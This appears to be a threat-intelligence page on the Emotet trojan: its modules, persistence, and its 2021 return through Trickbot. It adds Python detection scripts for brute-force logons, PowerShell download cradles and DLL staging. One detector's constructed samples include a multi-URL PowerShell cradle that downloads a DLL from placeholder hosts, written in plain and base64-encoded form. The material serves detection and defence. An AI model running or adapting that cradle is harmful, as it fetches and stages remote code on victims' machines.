Emotet is a pervasive and modular credential theft trojan which has historically been leveraged by threat actors in order to collect usernames and passwords for various financial institutions. However, beginning in late 2017 Emotet ceased to operate as a traditional credential theft trojan and began operating exclusively as a downloader. In its current role, Emotet is used to download a variety of secondary payloads including (but not limited to) Trickbot, Dridex, Qakbot, Ursnif, Smoke Loader, and IcedID.
Emotet is often used for widespread phishing and spear phishing campaigns. While its targeting is often very broad, Emotet has begun to run more targeted campaigns as well.
Emotet is almost always delivered through widespread or targeted phishing campaigns. These campaigns often include either an attachment, or a link to an attachment. These attachments are typically malicious macro-enabled Microsoft Office documents (often referred to simply as ‘maldocs’), which download the initial Emotet payload (Stage 1).
The Emotet malware frequently begins its installation by first choosing a file path based on specific system characteristics; the resulting path (including the filename) is composed of a concatenation of two strings drawn from a hard-coded list in the malware, and the file is stored under %APPDATA% or %LOCAL_APPDATA%. Emotet further conceals itself by removing the Zone.Identifier alternate data stream (ADS), which is typically added to files to mark that they were downloaded from an untrusted source (e.g. the Internet).
The Emotet malware often achieves persistence through the use of the Startup folder as defined by the %CSIDL_STARTUP% variable. Emotet will insert a weaponized LNK file into this folder linking to the actual payload.
The malware itself features a number of modules which are not written to disk, but instead are loaded directly into memory from remote, hard-coded command and control (C2) servers. These modules expand the functionality of Emotet, and include:
Mail Password Viewer
- The Mail Password Viewer is a module which loads a version of Mail PassView, allowing the threat actor to collect stored credentials, outputting them into a comma-separated value list for later data exfiltration.
Web Browser Password Viewer
- The Web Browser Password Viewer is a module which loads a version of Web Browser PassView. This module targets a number of browser types and attempts to collect stored credentials. Browsers targeted by this module include:
  - Internet Explorer / Edge
  - Firefox
  - Chrome / Chromium
  - Yandex Browser
Outlook Email Details Password Viewer
- The Outlook Email Details Password Viewer module is very similar to the Mail Password Viewer, except the details are not directly output into a comma-separated value list. Additionally, the module appears to attempt to scrape additional data from unread emails in PST files.
Network Spreader
- The Network Spreader module allows for lateral movement. This module works through attempted brute forcing of administrator credentials using a predefined list which may have been derived from the publicly available “Top 1000” password list.
Spammer
- The Spammer module allows an infected host to act as a distribution mechanism for further infections using malicious Unsolicited Bulk Email (UBE). This module is typically only delivered after an infection has persisted for a significant period of time, and typically only after the threat actors have validated that it is not blocked by existing anti-spam services.
Proxy
- The Proxy module, which was first identified in 2018, attempts to configure the infected system as an Internet-accessible proxy. If the device does not have an externally routable IP address, the Emotet module will attempt to reconfigure the router/firewall in front of the device with a rule created via Universal Plug and Play (UPnP) to make the device Internet-accessible.
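The Network Spreader behaviour described above is visible on the targeted host as a burst of failed network logons for one account from one source, sometimes followed by a successful logon for the same pair. The script below is an added example, not code from the report or from any Emotet sample: it runs that logic over constructed Windows Security log records (Event IDs 4625/4624, logon type 3). The event tuple layout, the source addresses, the account names and the threshold/window values are assumptions to be adapted to whatever the local SIEM exports.

```python
"""Spot brute-force bursts against one account from one source in Windows
logon telemetry (added example; sample events are constructed)."""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625
SUCCESSFUL_LOGON = 4624
NETWORK_LOGON = 3  # logon type 3: SMB / network authentication

# Constructed sample events: (timestamp, event id, logon type, source, target account).
SAMPLE_EVENTS = [
    # 12 failures against the local Administrator account, ~3 s apart, then a success
    *[("2021-11-15T09:00:%02d" % (1 + 3 * i), FAILED_LOGON, NETWORK_LOGON,
       "10.0.0.23", "Administrator") for i in range(12)],
    ("2021-11-15T09:00:45", SUCCESSFUL_LOGON, NETWORK_LOGON, "10.0.0.23", "Administrator"),
    # a few failures, well below threshold, against a service account
    *[("2021-11-15T09:02:%02d" % (5 * i), FAILED_LOGON, NETWORK_LOGON,
       "10.0.0.40", "svc_backup") for i in range(4)],
    # an interactive user mistyping a password twice: wrong logon type, ignored
    ("2021-11-15T09:05:00", FAILED_LOGON, 2, "WS-ALICE", "alice"),
    ("2021-11-15T09:05:10", FAILED_LOGON, 2, "WS-ALICE", "alice"),
    ("2021-11-15T09:05:20", SUCCESSFUL_LOGON, 2, "WS-ALICE", "alice"),
]


def find_bruteforce_bursts(events, threshold=10, window=timedelta(seconds=60)):
    """Return one alert per (source, account) whose failed network logons reach
    `threshold` inside any `window`. `success_after` is True when a successful
    network logon for the same pair lands during or shortly after the burst,
    which is the case that needs immediate attention."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, event_id, logon_type, source, account in events:
        if logon_type != NETWORK_LOGON:
            continue  # interactive failures are a different (usually benign) story
        when = datetime.fromisoformat(ts)
        if event_id == FAILED_LOGON:
            failures[(source, account)].append(when)
        elif event_id == SUCCESSFUL_LOGON:
            successes[(source, account)].append(when)

    alerts = []
    for key, times in failures.items():
        times.sort()
        best = None  # (first, last, count) of the densest qualifying window
        start = 0
        for end, t_end in enumerate(times):
            while t_end - times[start] > window:  # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[2]):
                best = (times[start], t_end, count)
        if best is None:
            continue
        first, last, count = best
        success_after = any(first <= s <= last + window for s in successes[key])
        alerts.append({
            "source": key[0],
            "account": key[1],
            "failures": count,
            "first": first.isoformat(),
            "last": last.isoformat(),
            "success_after": success_after,
        })
    # bursts that ended in a successful logon come first
    return sorted(alerts, key=lambda a: (not a["success_after"], -a["failures"]))


if __name__ == "__main__":
    for alert in find_bruteforce_bursts(SAMPLE_EVENTS):
        print(alert)
```

Only logon type 3 is counted so that a user mistyping a password at the console does not trip the rule; the threshold and window are deliberately conservative and should be tuned against a baseline of the environment's normal failure rate.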
Threat Update – Nov 2021
Emotet Threat Summary
The Emotet malware variant was first identified in 2014 by security researchers, and was originally created to be a banking trojan – however it has since evolved in functionality and, since its first discovery, has become one of the most disruptive malware variants in the wild. Believed to be based out of Ukraine, this infamous botnet malware-delivery system is typically delivered via malspam and has been observed in tandem with other malware like TrickBot, Qakbot and Zloader. The infrastructure sustaining Emotet was believed to have been “dismantled” via a global operation (Operation Ladybird) in January 2021, and activity was observed to have ceased.

In November 2021 researchers believe they have found the re-emergence of the Emotet botnet. In the instances discovered, Trickbot is being utilized to install Emotet on compromised Windows systems. Researchers are finding overlap between the new and old variants from a code and technique perspective, adding evidence of Emotet’s revival. This discovery indicates that the actors behind Emotet are attempting to get back up and running, and should be an alarming development for security teams.
Emotet Threat Synopsis
In November 2021, the Emotet malware variant was re-discovered by researchers and is believed to be a new distribution of the infamous malware. Utilizing systems already compromised with Trickbot, the new Emotet loader is being distributed, and the new associated DLL that it attempts to download has been identified as Emotet. From a techniques perspective, the infection is very similar to previous iterations. Delivery still consists of malspam emails, arriving via malicious script, maldoc execution or malicious links. Also, techniques such as (but not limited to) LOLBin abuse, Autorun/ASEP registry key modifications, and Rundll32 proxy execution were observed previously, and early research is showing that they have survived Emotet’s reincarnation.
The technique previously utilized by Emotet, abusing PowerShell commands to download the payload via multiple web addresses, has re-emerged but with a key difference. In the past, these PowerShell commands were obfuscated to potentially avoid security tools and detection – with research finding base64-encoded commands, for example. However, in the latest Emotet campaign, the threat actors have stopped using obfuscation and opted to execute the commands in plain text. This may be because the operators are attempting to make these commands appear more legitimate, as obfuscation can often be viewed as a red flag for malicious intent.
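A detection that keys only on base64 would miss the plain-text variant described above. The script below is an added example, not code from the report: it inspects process command lines for a PowerShell invocation that fetches from at least two distinct web addresses, decoding an -EncodedCommand argument (base64 of UTF-16LE, the form powershell.exe expects) when one is present and otherwise analysing the raw line, so both the older obfuscated form and the newer plain-text form hit the same rule. The sample command lines, the example.* hostnames and the cmdlet list are constructed assumptions.

```python
"""Flag PowerShell multi-URL download cradles, encoded or plain text
(added example; command lines below are constructed samples)."""
import base64
import re

URL_RE = re.compile(r"https?://[^\s'\"();,]+", re.IGNORECASE)
# cmdlets / .NET members commonly used to fetch remote content
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadString|DownloadFile|"
    r"Net\.WebClient|Start-BitsTransfer|Invoke-RestMethod",
    re.IGNORECASE,
)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand
ENCODED_RE = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline, min_urls=2):
    """Return a finding for a PowerShell command that downloads from at least
    `min_urls` distinct URLs, else None. The inspected script is the decoded
    payload when -EncodedCommand is present, otherwise the raw command line."""
    if "powershell" not in cmdline.lower():
        return None
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    urls = sorted(set(URL_RE.findall(script)))
    if len(urls) < min_urls or not DOWNLOAD_RE.search(script):
        return None
    return {"encoded": decoded is not None, "urls": urls, "script": script}


def _encode(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a multi-URL cradle in plain text and in encoded form
# (the two forms the report contrasts), then two benign controls.
CRADLE = (
    "$u='http://one.example/wp-content/a/','http://two.example/cgi-bin/b/',"
    "'http://three.example/c/';foreach($x in $u){try{Invoke-WebRequest $x "
    "-OutFile $env:TEMP\\upd.dll;break}catch{}}"
)
SAMPLE_COMMAND_LINES = [
    'powershell.exe -w hidden -c "' + CRADLE + '"',
    "powershell.exe -nop -w hidden -enc " + _encode(CRADLE),
    'powershell.exe -c "Get-Process | Sort-Object CPU -Descending"',
    "powershell.exe Invoke-WebRequest https://updates.example/app.msi -OutFile app.msi",
]


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze_command_line(line))
```

The `min_urls` threshold is what separates the cradle from an ordinary single-download administrative command (the last sample); lowering it to 1 turns the rule into a generic download-cradle hunt at the cost of more review noise.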
With the new samples being analyzed by security researchers, they have found that once the DLL is pulled, it is stored as a random file with a .dll extension in “C:\ProgramData”. It is then subsequently moved to another randomly generated folder under the infected account’s “AppData\Local” folder, which is used for persistence purposes. It should also be noted that Emotet post-infection traffic is now encrypted over HTTPS rather than the HTTP used in previous infections.
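The staging sequence just described (a randomly named DLL directly under C:\ProgramData, moved into a random folder under the user's AppData\Local, and run through Rundll32 proxy execution as noted earlier in this update) can be expressed as a small chain of host-telemetry rules; the LNK-in-Startup persistence from the first part of this page fits the same shape. The script below is an added example, not code from the report or from any Emotet sample. The event dictionaries are a simplified, constructed EDR-style shape, the file and folder names are made up, and the path regexes are assumptions that would need adjusting to a real product's field layout.

```python
"""Flag DLL staging under ProgramData / AppData\\Local, rundll32 loading from
those locations, and LNK files written to the Startup folder
(added example; events below are constructed)."""
import re

PROGRAMDATA_DLL = re.compile(r"^[a-z]:\\programdata\\[^\\]+\.dll$", re.IGNORECASE)
LOCALAPPDATA_DLL = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\[^\\]+\\[^\\]+\.dll$", re.IGNORECASE
)
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.IGNORECASE)
# rundll32[.exe] ["]<path>.dll["],<entry point>
RUNDLL32_TARGET = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^"]+?\.dll)"?\s*,', re.IGNORECASE)


def rundll32_dll(cmdline):
    """Return the DLL path rundll32 was asked to load, or None."""
    match = RUNDLL32_TARGET.search(cmdline)
    return match.group(1) if match else None


def is_staging_path(path):
    """True for a DLL directly under ProgramData or one folder deep in AppData\\Local."""
    return bool(PROGRAMDATA_DLL.match(path) or LOCALAPPDATA_DLL.match(path))


def detect_staging_chain(events):
    """Return (rule, detail) findings, one per matching event, in event order."""
    findings = []
    for ev in events:
        kind = ev["type"]
        if kind == "file_create" and PROGRAMDATA_DLL.match(ev["path"]):
            findings.append(("dll_dropped_in_programdata", ev["path"]))
        elif kind == "file_create" and STARTUP_LNK.search(ev["path"]):
            findings.append(("startup_lnk_written", ev["path"]))
        elif (kind == "file_move" and PROGRAMDATA_DLL.match(ev["src"])
              and LOCALAPPDATA_DLL.match(ev["dst"])):
            findings.append(("dll_staged_to_appdata_local", ev["dst"]))
        elif kind == "process_create" and ev["image"].lower().endswith("rundll32.exe"):
            dll = rundll32_dll(ev["cmdline"])
            if dll and is_staging_path(dll):
                findings.append(("rundll32_from_staging_dir", dll))
    return findings


# Constructed sample telemetry following the sequence in the report, then two
# benign controls: a vendor DLL in its own ProgramData subfolder and rundll32
# loading a system DLL.
SAMPLE_EVENTS = [
    {"type": "file_create", "process": "powershell.exe",
     "path": r"C:\ProgramData\ywkeqz.dll"},
    {"type": "file_move", "src": r"C:\ProgramData\ywkeqz.dll",
     "dst": r"C:\Users\bob\AppData\Local\Lpqdr\ywkeqz.dll"},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\bob\AppData\Local\Lpqdr\ywkeqz.dll",Control_RunDLL'},
    {"type": "file_create", "process": "rundll32.exe",
     "path": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ywkeqz.lnk"},
    {"type": "file_create", "process": "setup.exe",
     "path": r"C:\ProgramData\Vendor\helper.dll"},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


if __name__ == "__main__":
    for rule, detail in detect_staging_chain(SAMPLE_EVENTS):
        print(rule, detail)
```

Each rule on its own is noisy in some environments (installers do write DLLs under ProgramData); the value is in correlating the three DLL findings for the same file name, and in treating rundll32 loading from a user-writable directory as worth a look on its own. The HTTPS change noted above means network-side inspection of the post-infection traffic is harder, which is one more reason to lean on host telemetry like this.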